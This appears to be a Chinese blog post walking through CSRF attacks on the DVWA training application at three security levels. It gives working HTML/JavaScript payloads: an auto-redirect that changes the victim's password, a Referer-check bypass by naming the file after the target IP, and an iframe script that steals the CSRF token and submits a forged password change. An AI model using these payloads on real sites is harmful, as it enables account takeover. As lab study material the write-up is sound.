美文网首页
CSRF-DVWA利用

CSRF-DVWA利用

作者: Ign0re | 来源:发表于2016-12-02 17:10 被阅读0次

LEVE: low
自动跳转change

<head>
<title>404</title>
<meta http-equiv="Content-Language" content="zh-CN">
<script type="text/javascript">
    document.location = "http://192.168.13.83/dvwa/vulnerabilities/csrf/?password_new=123123&password_conf=123123&Change=Change#";
</script>
</head>
<body>
    <h2>页面出错了.  <h2>
</body>
</html>```



LEVE:  medium
这个由于限制的跨域,就是说自己把这段代码放在自己的x.x.x.x服务器就会失效。但是又限制的不是很好,仅仅检测是否请求头包含本机地址
于是

构造文件名为 192.168.13.83.html

由于本地搭建环境地址,把此文件扔于dvwa/目录下,远程访问,实现效果一样

最终password changed



LEVE:  height
高级限制了改密请求必须有crsf-token,
此处在中级基础上即色诱用户点击页面 >一个看不见框架偷偷访问修改密码的页面<,盗取合法用户的crsf-token,进行请求,完成攻击
but,现在的浏览器是不允许跨域请求的,现在相当于用户访问自己远程服务器上的恶意页面,而恶意页面内嵌frame,指向用户,盗crsf-token又修改密码,再向192.168.13.83/dvwa进行请求构成跨域

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">

function attack()

{

document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
// alert(document.getElementsByName('user_token')[0].value)
// alert(document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;)
// alert(document.getElementById("transfer").action)
document.getElementById("transfer").submit();

}

</script>
</head>

<body onload="attack()">

<iframe src="http://192.168.13.83/dvwa/vulnerabilities/csrf" id="hack" width=1000 height=900>

</iframe>

<form method="GET" id="transfer" action="http://192.168.13.83/dvwa/vulnerabilities/csrf">

<input type="hidden" name="password_new" value="password">

<input type="hidden" name="password_conf" value="password">

<input type="hidden" name="user_token" value="">

<input type="hidden" name="Change" value="Change">

</form>

</body></html>


现在存在现实就是跨域无法实现 采用XSS高级插出token
好了 去玩XSS

相关文章

  • CSRF-DVWA利用

    LEVE: low自动跳转change 构造文件名为 192.168.13.83.html 由于本地搭建环境地...

  • 利用与被利用

    今天看了一个视频,复旦的教授说“朋友无功利之用”。她大概的意思是说“你之所以交朋友,并不是因为朋友有用。我们之...

  • 利用与被利用

    愚拙的,不屑去骗,也甘于被骗;机灵的,不甘被利用,也时常去骗。“骗”,不止于欺骗,也有获取信息,掠夺物品。 身边就...

  • Selenium自动化

    定位元素 利用ID定位 利用tag name定位 利用link text定位 利用class name定位 利用n...

  • 利用

    被利用,说明你还有可用之处。 人是社群动物,人和人都是相互依存的。所谓的商业文明,说到底是因交换而存在而繁盛。交换...

  • 利用

    子时,晴夜朗空,一轮明月高悬。若是平时,这片树林该是一夜清幽。然而,此时却有两人在林间追逐,惊起禽鸟无数,...

  • 利用

    父亲因感冒住院了。 儿子来医院照看。 “爸,我俩是互相利用的!我利用你把我养大,你利用我给你养老!可万一我对你不好...

  • 利用

    中国的汉字是个好东西,因为它有多义。 利用:利于发挥效用,口语中多指贬义,出自《老子.道德经》:“三十辐共一毂,当...

  • 利用

    1.如果一个人遇到的人中80%的人都骗他,另外20%的人对他视而不见,那他一定是一个傻瓜;如果一个人遇到的人中有1...

  • 利用

    有之以为利,无之以为用

网友评论

      本文标题:CSRF-DVWA利用

      本文链接:https://www.haomeiwen.com/subject/dacqmttx.html